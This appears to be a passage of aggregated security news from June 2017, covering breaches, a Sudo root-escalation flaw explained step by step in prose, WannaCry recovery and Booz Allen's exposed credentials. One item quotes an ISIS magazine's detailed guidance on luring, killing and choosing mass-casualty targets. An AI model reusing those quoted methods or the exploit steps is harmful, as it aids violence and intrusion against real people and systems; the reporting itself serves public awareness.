This is not the first time Kmart discloses a data breach. In October 2014, the company told customers that their credit and debit cards may have been stolen after hackers installed malware on payment systems.

In both incidents, the company described the malware as being “undetectable by current antivirus systems” and in both cases it claimed that only card numbers were compromised. Kmart said the latest breach does not appear to be linked to a previous incident.

“I think the single most important piece of information that we know so far is that this could have been much, much worse,” said Richard Henderson, global security strategist at Absolute. “If KMart did not have EMV-enabled terminals in their stores, forcing customers with chip cards to swipe their stripe, then the impact may have been substantially larger. It's critical that we continue the slow march in the US to full EMV adoption. While EMV is by no means infallible, it is leagues better than the ancient mag stripe technology that continues to be exploited by attackers on a regular basis."


High-Severity Linux Sudo Flaw Allows Users to Gain Root Privileges
1.6.2017 thehackernews Vulnerebility
A high-severity vulnerability has been reported in Linux that could be exploited by a low privilege attacker to gain full root access on an affected system.
The vulnerability, identified as CVE-2017-1000367, was discovered by researchers at Qualys Security in Sudo's "get_process_ttyname()" function for Linux that could allow a user with Sudo privileges to run commands as root or elevate privileges to root.
Sudo, stands for "superuser do!," is a program for Linux and UNIX operating systems that lets standard users run specific commands as a superuser (aka root user), such as adding users or performing system updates.
The flaw actually resides in the way Sudo parsed "tty" information from the process status file in the proc filesystem.
On Linux machines, sudo parses the /proc/[pid]/stat file in order to determine the device number of the process's tty from field 7 (tty_nr), Qualys Security explains in its advisory.
Although the fields in the file are space-delimited, it is possible for field 2 (the command name) to include whitespace (including newline), which sudo doesn't account for.
Therefore, a local user with sudo privileges (Sudoer) on SELinux-enabled systems can cause sudo to use a device number of his choice "by creating a symbolic link from the sudo binary to a name that contains a space, followed by a number," escalating their privileges to overwrite any file on the filesystem, including root-owned files.
"To exploit the bug, the user can choose a device number that does not currently exist under /dev. If sudo does not find the terminal under the /dev/pts directory, it performs a breadth-first search of /dev...The attacker may then create a symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm," an alert on the sudo project website reads.
"This file will be used as the command's standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link under /dev/shm is replaced with a link to another file before [sudo opens it], it is possible to overwrite an arbitrary file by writing to the standard output or standard error. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers."
The vulnerability, which affects Sudo 1.8.6p7 through 1.8.20 and marked as high severity, has already been patched in Sudo 1.8.20p1, and users are recommended to update their systems to the latest release.
Red Hat yesterday pushed out patches for Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7, and Red Hat Enterprise Linux Server. Debian has also released fixes for its Wheezy, Jessie and Sid releases and SUSE Linux has rolled out fixes for a number of its products.
Qualys Security said it would publish its Sudoer-to-root exploit once a maximum number of users have had time to patch their systems against the flaw.


OneLogin Investigating Breach at U.S. Data Center

1.6.2017 securityweek  Incindent
Identity and access management solutions provider OneLogin informed customers on Wednesday that it had detected unauthorized access at its U.S. data center.

OneLogin CISO Alvaro Hoyos said the breach was detected on May 31 and blocked the same day. Law enforcement has been notified and an independent security firm has been called in to assess the impact and cause of the intrusion.

While Hoyos’ statement contains few details, the emails sent to affected customers reveal that all users served by the company’s U.S. data center are impacted and may have had their information compromised.

OneLogin said it can’t provide additional information on the incident due to the ongoing law enforcement investigation, but a support page made available to customers mentions that the exposed information can be used to decrypt encrypted data.

The company, whose services are used by more than 2,000 enterprises in 44 countries, is requiring affected customers to force a OneLogin directory password reset for all their users, generate new certificates for apps that use SAML SSO, generate new API credentials and OAuth tokens, and generate new directory tokens for Active Directory and LDAP connectors.

The list of required actions also includes updating credentials for third-party apps such as G Suite and Workday, generating new Desktop SSO tokens, recycling any secrets stored in Secure Notes, updating credentials for third-party app provisioning, updating admin credentials for apps that use form-based authentication, replacing RADIUS shared secrets, and instructing end-users to update their passwords for form-based authentication apps.

The long list of instructions for IT teams suggests that this was a significant breach that could have serious consequences.

The incident comes less than a year after OneLogin admitted that hackers gained access to Secure Notes data after stealing an employee’s password.

Secure Notes are normally protected using multiple levels of AES-256 encryption, but a bug caused the data to be visible in clear text in the company’s log management system, to which attackers had access for several weeks.


U.S. Defense Contractor Exposes Sensitive Military Data

1.6.2017 securityweek BigBrothers

 Sensitive data belonging to the U.S. National Geospatial-Intelligence Agency (NGA) was left exposed on the Internet by defense and intelligence contractor Booz Allen Hamilton, a security firm revealed on Wednesday.

The NGA is a combat support and intelligence agency working under the Department of Defense. The geospatial intelligence provided by the organization is used by policymakers, the military, intelligence professionals and first responders.

Chris Vickery, a researcher who in the past identified billions of records exposed online due to weak configurations, discovered an unprotected Amazon S3 bucket containing tens of thousands of potentially sensitive files. Accessing the files did not require a password and all data was stored in clear text.

The data, belonging to the NGA, was connected – based on domain registration details and credentials – to Booz Allen Hamilton and another one of the agency’s contractors, Metronome. The files, some of which were marked as “top secret,” included military information, SSH keys belonging to a Booz Allen engineer, and admin credentials for a system housed by one of the contractor’s data centers.

Vickery, who recently joined cyber resilience firm UpGuard as a risk analyst, found the files on May 22 and notified Booz Allen two days later. After receiving no response from the company, Vickery alerted the NGA directly on May 25, and the exposed repository was secured within minutes. An unnamed government regulatory agency has asked UpGuard to hold on to the data.

The NGA said it immediately revoked affected credentials, but described the exposed files as “sensitive but unclassified information.” Booz Allen also claimed there was no evidence that any classified information or systems were exposed.

This is not the first time Vickery has discovered a data leak involving Booz Allen Hamilton. In late 2016, he reported that one of the company’s subcontractors, Potomac Healthcare Solutions, had leaked military healthcare worker data.

The intelligence contractor itself was involved in several security incidents in the past years, including a 2011 attack by Anonymous hacktivists, the Edward Snowden leaks, and the alleged theft of classified material by Harold Thomas Martin III.

The findings of Vickery and other researchers over the past years have demonstrated the risks posed by misconfigured AWS S3 buckets, but many organizations still fail to protect data stored in the cloud.

"AWS S3 is a very popular cloud based object storage service, and a staple of most AWS environments from the earliest days of the cloud service. Yet security of S3 buckets to prevent accidental data exposure is often poorly understood and badly implemented by their users, even someone as technically savvy as an engineer with one of the world’s leading defense contractors,” explained Zohar Alon, Co-Founder and CEO of Dome9.

“This type of oversight exemplifies the one-strike law for security in the public cloud. A single vulnerability, or security, or process lapse is all it takes to expose highly sensitive private data to the world and get data-jacked. Even with strict security controls in place, breaches such as this still occur due to very basic process failures, leaving extraordinarily sensitive information exposed to the world," Alon added.


ISIS Publishes Detailed Guide on How to Use Services Like Craigslist to Lure Non-Believers to Their Death
1.6.2017 securityweek Cyber 

ISIS has released a detailed guide on how to murder non-believers. The tutorial provides advice on how to lure targets via fake ads on websites to kille them.
ISIS has released a detailed guide on how to murder non-believers. The tutorial provides advice on how to lure targets via fake ads on websites such as Craigslist, Gumtree and eBay, in order to kill them. The current installment of ISIS’ English-language propaganda magazine Rumiyah explains how to attain hostages and mass murder a large amount of people.

The magazine also suggests posting fake employment ads as another means of luring victims to their demise.

“After garnering a significant amount of applicants, one can then arrange the ‘job interview’ location and times, spacing out the applicants’ appointment times so as to give oneself time to subdue each target as he arrives — luring him to an appropriate location before attacking, subduing, binding and then slaughtering them.”

Alternatively, according to the magazine, falsely advertising an apartment for rent can also achieve the desired result:

“‘The advertisement should be for a small single-room or studio apartment,’ the article states.

ISIS guide

‘This will help ensure that the viewer comes alone.’

The article is so detailed that it suggests followers dedicate a room for the ‘disposal of bodies … for the obvious reason of not alerting those intended victims entering the property after them’, and that they buy a ‘bat or small club’ to beat the victim over the head with before slaughtering them with a ‘strong, sharp knife’.

‘Additionally, carrying out this type of operation in the daytime hours will also help in this regard as it allows one to exploit the noise pollution that comes with the movement of people during those hours to drown out any sounds that may be heard as a consequence of one’s attacks,’ the article states.”

Rumiyah gives the reader a green light, ensuring that luring a non-believer, under false pretenses, in an effort to murder them is “divinely approved” by Allah.

Large-scale terrorist attacks are advocated by the magazine, which states that “the scenario for such as attack is that one assault a busy, public and enclosed location and rounds up the kuffar (non-Muslims) who are present.”

It goes on to say:

“Having gained control over the victims, one should then proceed to slaughter as many of them as he possibly can before the initial police response.”

“Ideal target locations for hostage-taking scenarios include nightclubs, movie theatres, busy shopping malls and large stores, popular restaurants, concert halls, university campuses, public swimming pools, indoor ice-skating rinks, and generally any busy enclosed area, as such an environment allows for one to take control of the situation by rounding up the kuffar present inside and allows one to massacre them while using the building as a natural defence against any responding force attempting to enter and bring the operation to a quick halt.”

“Similarly, characteristics of a good target location include low light conditions, as it grants one the ability to manoeuvre between the people, taking advantage of the confusion and killing as many of the kuffar as physically possible.”

Rumiyah also suggests that if an ISIS soldier is unable to obtain a gun legally, they can always ram-raid hunting or military stores in order to acquire a firearm. Rumiyah indicates that the objective of taking hostages in “lands of disbelief”, such as Australia and the U.S., is to “create as much carnage and terror as one possibly can until Allah decrees his appointed time and the enemies of Allah storm his location or succeed in killing him.”

One of the main purposes of terrorist groups using the Internet is recruitment. On Tuesday, a former Guantanamo Bay inmate was detained in Bordeaux, France as part of a terror crackdown. Sabir Mahfouz Lahmar was one of six suspects arrested for allegedly being part of a French ISIS recruiting network. But, this is not Lahmar’s first go round with the system–he was freed from Gitmo in 2009 after France agreed to accept him. Lahmar was one of six Algerians detained in Bosnia in 2001 on suspicion of plotting to bomb the US embassy in Sarajevo.

So, what’s being done about the continued proliferation of terrorist activity online? Last Friday, world leaders agreed to ramp up the heat on social media giants, in response to the backlash against the spread of online terrorism. According to The Mirror:

“The G7 group issued an unprecedented order telling Internet outfits like Google, Facebook and Twitter to ‘act urgently’ in developing new tools to block violent content.”

The joint statement represented a significant win for Theresa May at her first G7 summit. The PM has led the charge against online terror, first as Home Secretary and then as Prime Minister – and now has other world leaders on her side.

British officials said US President Donald Trump and new French President Emmanuel Macron proved key allies at the summit in Sicily, pressing other leaders to back the plan.”

The G7’s joint statement:

“The internet has proven to be a powerful tool for terrorist purposes. The G7 calls for communication service providers and social media companies to substantially increase their effort to address terrorist content.”

“We encourage the industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence. And we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism.”

Demanding that businesses take certain measures in order to help fight terrorism has not always been well-received by businesses. And, there’s always the issue of infringing on civil liberties, so the future of the G7’s plan is uncertain.

The U.S. military, however, has shown some improvement in countering the digital operations of ISIS.

According to Lt. Gen. Paul Nakasone, commanding general of Army Cyber Command, over the past six months, a lot of progress has been made. “I think what we are learning is in terms of being able to counter a message, being able to attack a brand — in this case, the brand of ISIS — and then, the other thing is, how do we do this with the speed and accuracy that is able to get at an adversary that six months ago was moving uncontested in cyberspace,” he said at a Senate Armed Services subcommittee hearing. “I think we’ve learned those things over the last six months. I think we as a department have done much better.”

It appears the U.S. Army has thrown down the gauntlet:

“Quite simply, ISIS is no longer uncontested in cyberspace, and that’s a change,” said U.S. Army Cyber Command spokesman Charlie Stadtlander. “[Joint Task Force Ares] has demonstrated the value to the Joint Force that cyber can be a meaningful contribution to an overall military mission.”

But, the lingering question, as to who in government is best suited to counter information operations, remains an unsolved mystery on Capitol Hill.

NSA Director and U.S. Cyber Command head Adm. Michael Rogers admitted during a recent hearing that U.S. Cyber Command is not “optimized” to combat information operations launched by foreign powers.

“It right now is not in our defined set of responsibilities per say,” Rogers said. “I would be the first to admit that [information warfare] is not what our workforce is optimized for … we are certainly not where we”


Top Defense contractor left Pentagon docs unsecured on Amazon server
1.6.2017 securityweek BigBrothers

A top defense contractor left tens of thousands sensitive Pentagon documents on Amazon Server Without any protection in places.
The popular security expert Chris Vickery discovered more than 60,000 sensitive files belonging to a US military project for the National Geospatial-Intelligence Agency (NGA) left on Amazon cloud storage server without authentication.

The documents were reportedly left unsecured on a public Amazon server by one of the nation’s top intelligence defense contractor.

The files contain passwords to a US government system containing sensitive information and the security credentials of a senior employee of the top defense contractor Booz Allen Hamilton.

Vickery discovered the documents included login credentials for code repositories that could contain classified files and other credentials.

Digging the 28GB archive, the expert discovered the private Secure Shell (SSH) keys of a Booz Allen employee, and a half dozen plain text passwords belonging to government contractors with Top Secret Facility Clearance.

“A cache of more than 60,000 files was discovered last week on a publicly accessible Amazon server, including passwords to a US government system containing sensitive information, and the security credentials of a lead senior engineer at Booz Allen Hamilton, one of the nation’s top intelligence and defense contractors.” reported Gizmodo.com “What’s more, the roughly 28GB of data contained at least a half dozen unencrypted passwords belonging to government contractors with Top Secret Facility Clearance.”

The most disconcerting part of the discovery is that the archive The exposed data even contained master credentials granting administrative access to a highly-protected Pentagon system.

Defense contractor data leak

The files are no more available online but someone could have downloaded those sensitive documents with serious consequences for the US intelligence.

On May 24, Vickery first tried to notify the leak to Booz Allen Hamilton’s Chief Information Security Officer (CISO).

“In short, information that would ordinarily require a Top Secret-level security clearance from the DoD was accessible to anyone looking in the right place; no hacking was required to gain credentials needed for potentially accessing materials of a high classification level,” wrote Dan O’Sullivan, Cyber Resilience Analys at UpGuard.

Booz Allen promptly launched an investigation into the data leak.

“Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment,” a Booz Allen spokesman told Gizmodo. “We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter.”

The Geospatial-Intelligence Agency (NGA), which in March awarded Booz Allen an $86 million defense contract, is also forensic investigating the incident.

“We immediately revoked the affected credentials when we first learned of the potential vulnerability,” the NGA said in a statement. “NGA assesses its cyber security protections and procedures constantly with all of its industry partners. For an incident such as this, we will closely evaluate the situation before determining an appropriate course of action.” states Booz Alle”Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment,” a Booz Allen spokesperson told Gizmodo.

“We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter.”

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet.

In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

Vickery’s also disclosed a massive data breach at a U.S.-based data warehouse, Schoolzilla, which held personal information on more than a million American students (K-12).

adrotate banner=”9″]


WannaCry mistakes that can help you restore files after infection
1.6.2017 Kaspersky Ransomware  

Sometimes ransomware developers make mistakes in their code. These mistakes could help victims regain access to their original files after a ransomware infection. This article is a short description of several errors, which were made by the WannaCry ransomware developers.

Errors in file removal logic

When Wannacry encrypts its victim’s files, it reads from the original file, encrypts the content and saves it into the file with extension “.WNCRYT”. After encryption it moves “.WNCRYT” into “.WNCRY” and deletes the original file. This deletion logic may vary depending on the location and properties of the victim’s files.

The files are located on the system drive:

If the file is in an ‘important’ folder (from the malware developers’ point of view – e.g. Desktop and Documents), then the original file will be overwritten with random data before removal. In this case, unfortunately, there is no way to restore the original file content.

If the file is stored outside of ‘important’ folders, then the original file will be moved to %TEMP%\%d.WNCRYT (where %d denotes a numeric value). These files contain the original data and are not overwritten, they are simply deleted from the disk, which means there is a high chance it will be possible to restore them using data recovery software.

Renamed original files that can be restored from %TEMP%

The files are located on other (non-system) drives:

Ransomware creates the “$RECYCLE” folder and sets hidden+system attributes to this folder. This makes this folder invisible in Windows File Explorer if it has a default configuration. The malware intends to move the original files into this directory after encryption.

The procedure that determines the temporary directory to store original files before removal

However, because of synchronization errors in the ransomware code in many cases the original files stay in the same directory and are not moved into $RECYCLE.
The original files are deleted in an unsecure way. This fact makes it possible to restore the deleted files using data recovery software.

Original files that can be restored the from a non-system drive

The procedure that constructs the temporary path for an original file

The piece of code calling the above procedures

Read-only files processing error

While analysing WannaCry, we also discovered that this ransomware has a bug in its read-only file processing. If there are such files on the infected machine, then the ransomware won’t encrypt them at all. It will only create an encrypted copy of each original file, while the original files themselves only get the “hidden” attribute. When this happens, it is simple to find them and restore their normal attributes.

Original read-only files are not encrypted and stay in the same place

Conclusions

From our in depth research into this ransomware, it is clear that the ransomware developers have made a lot of mistakes and, as we pointed out, the code quality is very low.

If you were infected with WannaCry ransomware there is a good possibility that you will be able to restore a lot of the files on the affected computer. To restore files, you can use the free utilities available for file recovery. We advise organizations share this article with their system administrators – as they can use the file recovery utilities on affected machines in their network.


US Defense Contractor left Sensitive Files on Amazon Server Without Password
1.6.2017 thehackernews BigBrothers
Sensitive files linked to the United States intelligence agency were reportedly left on a public Amazon server by one of the nation's top intelligence contractor without a password, according to a new report.
UpGuard cyber risk analyst Chris Vickery discovered tens of thousands of documents from a US military project for the National Geospatial-Intelligence Agency (NGA) left unsecured on Amazon cloud storage server for anyone to access.
The documents included passwords to a US government system containing sensitive information, and the security credentials of a senior employee of Booz Allen Hamilton, one of the country's top defense contractors.
Although there wasn't any top secret file in the cache Vickery discovered, the documents included credentials to log into code repositories that could contain classified files and other credentials.
Master Credentials to a Highly-Protected Pentagon System were Exposed
Roughly 28GB of exposed documents included the private Secure Shell (SSH) keys of a Booz Allen employee, and a half dozen plain text passwords belonging to government contractors with Top Secret Facility Clearance, Gizmodo reports.
What's more? The exposed data even contained master credentials granting administrative access to a highly-protected Pentagon system.
The sensitive files have since been secured and were likely hidden from those who didn't know where to look for them, but anyone, like Vickery, who knew where to look could have downloaded those sensitive files, potentially allowing access to both highly classified Pentagon material and Booz Allen information.
"In short, information that would ordinarily require a Top Secret-level security clearance from the DoD was accessible to anyone looking in the right place; no hacking was required to gain credentials needed for potentially accessing materials of a high classification level," Vickery says.
Vickery is reputed and responsible researcher, who has previously tracked down a number of exposed datasets on the Internet. Two months ago, he discovered an unsecured and publicly exposed database, containing nearly 1.4 Billion user records, linked to River City Media (RCM).
Vickery is the one who, in 2015, reported a huge cache of more than 191 Million US voter records and details of nearly 13 Million MacKeeper users.
Both NGA and Booz Allen are Investigating the Blunder
The NGA is now investigating this security blunder.
"We immediately revoked the affected credentials when we first learned of the potential vulnerability," the NGA said in a statement. "NGA assesses its cyber security protections and procedures constantly with all of its industry partners. For an incident such as this, we will closely evaluate the situation before determining an appropriate course of action."
However, Booz Allen said the company is continuing with a detailed forensic investigation about the misstep.
"Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment," a Booz Allen spokesperson told Gizmodo.
"We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter."
Booz Allen Hamilton is the same consulting firm that employed whistleblower Edward Snowden when he disclosed the global surveillance conducted by the NSA. It is among top 100 US federal contractor and once described as "the world’s most profitable spy organisation."


Enterprise Mobile Apps Expose Sensitive Data via Backend Systems

1.6.2017 securityweek Mobil
Many of the applications installed on enterprise mobile devices expose potentially sensitive data by failing to properly secure the connection between the app and backend servers, enterprise mobile security firm Appthority warned in a report published on Wednesday.

An analysis conducted by researchers has shown that the attack vector, dubbed by Appthority “HospitalGown” due to similarities with hospital gowns which typically expose the patient’s backside, affects more than 1,000 iOS and Android apps installed on enterprise devices.

The attack relies on vulnerabilities in the mobile application’s architecture and infrastructure, and it requires finding weaknesses in the communications between the app and server-side components.

Enterprise applications often connect to a backend database that stores user and other information. One of the tools used to analyze and mine the data stored on backend servers is the Elasticsearch engine. Given its popularity in large enterprises, Appthority has decided to focus its investigation on apps that use Elasticsearch.

While the connection between the mobile app, its API and the Elasticsearch data store is typically secure, the Elasticsearch server is often exposed to the Internet. Appthority has identified more than 21,000 open Elasticsearch servers connecting to the 1,000 apps exposed to HospitalGown attacks. These servers exposed a total of 43 terabytes of data.

In addition to allowing access to data via unprotected Elasticsearch servers, the HospitalGown attack can leverage the way apps interact directly with the server. For example, researchers pointed out that an attacker could reverse engineer a mobile app to obtain the IP address of the Elasticsearch server, scan the Internet or the victim’s network for other vulnerable servers, and intercept traffic going to the server.

Appthority’s analysis focused on 39 popular iOS and Android applications found on enterprise mobile devices, such as ones used for agriculture, content management, dating, education, games, news, office productivity, travel, and mobile security and access management.

These apps were found to leak 163 gigabytes of data containing roughly 280 million records, including personally identifiable information (PII) and corporate data. Appthority believes the exposed data can be useful to launch further attacks, conduct fraud, or it can be sold to other malicious actors.

“Weakly secured backends leveraged by mobile app developers create opportunities for big data leaks and a signi cant increase in the risk of data misuse for spear phishing, brute force login, or other types of PII-based attacks for enterprises with employees, partners, or customers that use or have ever used these apps,” Appthority said in its report.

One of the analyzed apps was Pulse Workspace, which is used by enterprises, government agencies and service providers. While the application protected frontend Elasticsearch access using an API, the backend exposed Pulse Workspace customer data, including names, contact information, PIN reset tokens, and device information. The vendor patched the vulnerability after being notified by Appthority.

HospitalGown attack

According to experts, HospitalGown attacks can be highly problematic as they are not easy to detect and prevent without comprehensive security and visibility mechanisms in place, and addressing the underlying vulnerability can prove difficult, especially if the weakness is exclusively on the backend.


Google Rolls Out Business-Focused Security Enhancements for Gmail

1.6.2017 securityweek  Security
Google today announced a series of improvements to Gmail’s security aimed at making the service better at protecting business data.

As part of the newly rolled out update, Gmail will provide customers with early phishing detection capabilities and "click-time warnings" for malicious links that might have been included in messages coming from outside sources. External reply warnings were also rolled out to help prevent data loss, Andy Wen, Senior Product Manager, Counter Abuse Technology at Google, says.

Gmail’s updated phishing detection mechanism takes advantage of machine learning, and Wen claims the service can keep sneaky spam and phishing messages out of customers’ inboxes with an over 99.9% accuracy. He also points out that 50%-70% of all messages received in Gmail are spam.

To improve their spam detection accuracy, Google launched early phishing detection, a dedicated machine learning model designed to selectively delay messages to perform rigorous phishing analysis. Only potentially suspicious messages will be flagged and delayed to perform additional checks on their content.

According to Wen, this should impact less than 0.05% of messages on average but should result in improved user data protection. In some cases, the additional checks could result in some messages arriving in the user’s inboxes with a delay of up to 4 minutes.

The feature, however, isn’t meant to replace anti-malware/phishing software, and admins can control it from the Admin console. The feature is launched On by default, Google says.

Paired with Google Safe Browsing machine learning, the detection models also aim at finding phishy and suspicious URLs and flagging them to the user.

These models leverage techniques such as reputation and similarity analysis on URLs, thus resulting in Gmail generating new URL click-time warnings for phishing and malware links. The feature was rolled out for Gmail on Android in the beginning of the month.

Aiming at preventing data loss, Gmail now displays unintended external reply warnings to users when they try to respond to someone outside the company domain. The service should know if the recipient is an existing contact or someone the user interacts with regularly, thus avoiding unnecessary warnings being displayed.

“This feature can give enterprises protection against forged email messages, impersonation, as well as common user-error when sending mail to the wrong contacts,” Google explains.

In addition to these enhancements, Google’s email service also received new built-in defenses against ransomware and polymorphic malware, meant to help it block millions of other messages that could potentially harm users.

The feature is meant to correlate spam signals with attachment and sender heuristics, and should result in successfully predicting messages containing new and unseen malware variants, Sri Somanchi, Product Manager, Gmail anti-spam, says.

“We classify new threats by combining thousands of spam, malware and ransomware signals with attachment heuristics (emails that could be threats based on signals) and sender signatures (already marked malware),” Wen notes.


Spear-Phishing Attacks Increasingly Focused: Report

1.6.2017 securityweek Phishing
Spear-phishing attacks have become increasingly “laser-focused,” with many campaigns aimed at only a small number of inboxes belonging to the targeted organization, according to a report published this week by Israel-based anti-email phishing solutions provider IRONSCALES.

The company has analyzed data from 500,000 inboxes belonging to more than 100 of its customers over a period of 12 months. An evaluation of 8,500 emails that bypassed spam filters showed that roughly 77 percent of attacks targeted 10 inboxes or less, and one-third of malicious messages targeted only one inbox.

Experts believe attackers have been targeting fewer inboxes as this can help their operation stay under the radar longer, and it increases their chances of success if the emails are “hyper-personalized.”

The IRONSCALES study showed that 65 percent of email phishing attacks lasted for up to one month, and nearly half of them only lasted for less than 24 hours. Of the campaigns that went on for more than 30 days, roughly one-third spanned across 12 months or more.

Researchers noticed that attackers have increasingly aimed blast campaigns, which are not tailored to the recipient, at less than 10 mailboxes at a time. On the other hand, malware drip campaigns, which are more personalized, are more successful at bypassing traditional spam filters and they typically last longer.

According to the report, nearly 95 percent of phishing emails were part of highly targeted campaigns involving messages that impersonated someone from within the organization. Phishing emails that spoof a popular brand name are less common as they are more likely to be caught by spam filters - IRONSCALES noted that for every five brand-spoofing attacks detected by spam filters, 20 spear-phishing emails went undetected.

The most targeted departments are operations and finance, and the most frequently spoofed brands are DHL and Google.

“Sophisticated email phishing attacks represent the biggest threats to organizations of all sizes,” said Eyal Benishti, founder and CEO of IRONSCALES. “This report verifies that attackers have adopted numerous tools and techniques to circumvent traditional rules-based email security and spam filters. It’s now incumbent upon all organizational leaders to make sure that their employees are well-trained in phishing mitigation and that the cybersecurity technology in place is sophisticated enough to identify, verify and remediate email phishing attacks in real-time.”


US Says No Laptop Ban on Board Flights From Europe for Now

1.6.2017 securityweek Security
US aviation security officials stepped back Tuesday from imposing a ban on carry-on computers on flights coming from Europe, which had been proposed to guard against possible bomb-laden electronics from the Islamic State group.

But the Department of Homeland Security said a ban, already in place for US-bound flights from the Middle East, could still be implemented for Europe if the threat level worsens.

In a phone discussion with European Home Affairs Commissioner Dimitris Avramopoulos and Transport Commissioner Violeta Bulc Tuesday, DHS Secretary John Kelly "made it clear" a ban on passengers carrying tablet and computer-sized electronics on board flights to the United States "is still on the table," DHS said in a statement.

"Secretary Kelly affirmed he will implement any and all measures necessary to secure commercial aircraft flying to the United States –- including prohibiting large electronic devices from the passenger cabin -– if the intelligence and threat level warrant it."

A European Commission spokesperson confirmed the discussion, saying that no decision had been made on the laptop ban, but that the two sides "agreed to intensify talks" on tightening aviation security.

On March 21, Washington announced a ban on carry-on laptops and other electronics larger than cellphone on direct flights to the United States from 10 airports in Turkey, the Middle East and North Africa.

The move came after intelligence officials learned of efforts by the Islamic State group to fashion a bomb into consumer electronics.

From any of those airports, US-bound passengers were forced to keep their electronics in checked baggage.

One day later Britain announced a similar ban for flights originating from six countries, and by early May DHS was threatening to impose a similar restriction for flights from Europe to the United States.

That would have a huge effect on the coming high travel season, with more than 3,250 flights a week scheduled to leave EU airports for the US this summer.

But after weeks of discussions, no decision was made. EU officials acknowledge that the decision is in the hands of US authorities.

DHS spokesman David Lapan said that Europan officials would be given ample warning ahead of any ban.


Developer of Advanced 'Bachosens' Malware Fails to Hide Identity

1.6.2017 securityweek Virus
Symantec has been tracking the activities of a “lone wolf” hacker who has apparently developed a sophisticated piece of malware that he has used to access the systems of at least two major organizations. However, researchers believe the cybercriminal made a relatively small profit and failed to protect his real identity.

The security firm first spotted the malware, which it tracks as “Bachosens,” in 2014, but there is evidence that its developer had launched attacks since as early as 2009. Symantec initially believed that the attacks involving Bachosens had been carried out by a nation-state threat actor given the malware’s sophistication, but further analysis revealed some rookie mistakes.

Bachosens, believed to have been delivered via spear-phishing emails, is a backdoor Trojan that gives its operator persistent access to the targeted system. In the attacks it analyzed, Symantec also spotted a keylogger, which researchers believe was manually pushed by the cybercriminal onto the infected device.

Unlike many other backdoors, which use HTTP or HTTPS to communicate with their command and control (C&C) servers, Bachosens uses DNS, ICMP and HTTP. The malware leverages a domain generation algorithm (DGA) to create C&C domains, but experts determined that the DGA is configured to only generate 13 domains per year.

Symantec has observed Bachosens infections on the systems of a Chinese autotech company and a large commercial airline. There is also evidence that the attacker targeted an online gambling firm, but his attempts failed.

While Bachosens is fairly advanced, the fact that the keylogger did not use any obfuscation, and the fact that one malware sample was packaged with an online game led experts to realize that these attacks were not the work of a sophisticated threat actor.

A closer analysis of strings found in the malware and domain registration data pointed researchers to a Russian-speaking individual who appears to reside in the town of Tiraspol in eastern Moldova. Tiraspol is the capital of the self-proclaimed state of Transnistria, where Russian is the dominant language.

The hacker, who researchers have identified only as Igor, is apparently connected to an auto parts store, which explains why he would target the Chinese autotech company. Researchers said the cybercriminal stole car diagnostics software that retails for $1,100 and sold it for only $110 on various forums and specifically created websites. On the other hand, it’s unclear why Igor would target a commercial airline.

Experts said the hacker posted personal information on public car forums, exposing his real identity.

“The level of information the attacker knowingly or negligently revealed about himself online gave us high confidence that he is an individual involved in the auto industry who is based in this part of Eastern Europe,” Symantec said in a blog post.

“His likely location in Tiraspol may also explain why he appears to have such modest aims when it comes to the gains he seems to be making from cyber crime. Although it is hard to get official data given it is a disputed territory, the average monthly salary in Transnistria has been reported as being as little as a few hundred euro. In that context, selling stolen software online for a few hundred euro could represent quite the windfall for an individual based in that part of the world,” the company added.

While researchers have apparently obtained a significant amount of information on the malware and its developer, some questions remain, including how Igor managed to create a sophisticated piece of malware while doing such a poor job at protecting his identity. One possibility is that he acquired the malware from someone, but Symantec believes this is unlikely given that no one else has used Bachosens.


Linux Flaw Allows Sudo Users to Gain Root Privileges

1.6.2017 securityweek Vulnerebility
A vulnerability affecting the manner in which Sudo parsed tty information could have resulted in the user gaining root privileges and being able to overwrite any file on the filesystem on SELinux-enabled systems.

Tracked as CVE-2017-1000367, the vulnerability was discovered by Qualys Security in Sudo's get_process_ttyname() for Linux. The issue resides in how Sudo parses tty information from the process status file in the proc filesystem.

The vulnerability could be exploited by a local user with privileges to execute commands via Sudo and could result in the user being able to escalate their privileges to root. Featuring a CVSS3 Base Score of 7.8, the issue is considered High severity.

In their advisory, Qualys Security explains that Sudo's get_process_ttyname() function opens "/proc/[pid]/stat" (man proc) and reads the device number of the tty from field 7 (tty_nr). Although these fields are space-separated, it is possible for field 2 (comm, the filename of the command) to contain spaces, the security researchers explain.

Thus, Sudoer users on SELinux-enabled systems could escalate their privileges to overwrite any file on the filesystem with their command's output, including root-owned files.

To successfully exploit the issue, a Sudo user would have to choose a device number that doesn’t exist under "/dev". Because Sudo performs a breadth-first search of /dev if the terminal isn’t found under the /dev/pts directory, the user could allocate a pseudo-terminal between the two searchers and create a “symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm,” an alert on Sudo reads.

The attacker then uses the file as the command's standard input, output and error when a SELinux role is specified on the sudo command line. If the symbolic link is replaced with another file before Sudo opens it, it allows the overwriting of arbitrary files by writing to the standard output or standard error.

“If SELinux is enabled on the system and Sudo was built with SELinux support, a user with sudo privileges may be able to overwrite an arbitrary file. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers,” the alert on Sudo reveals.

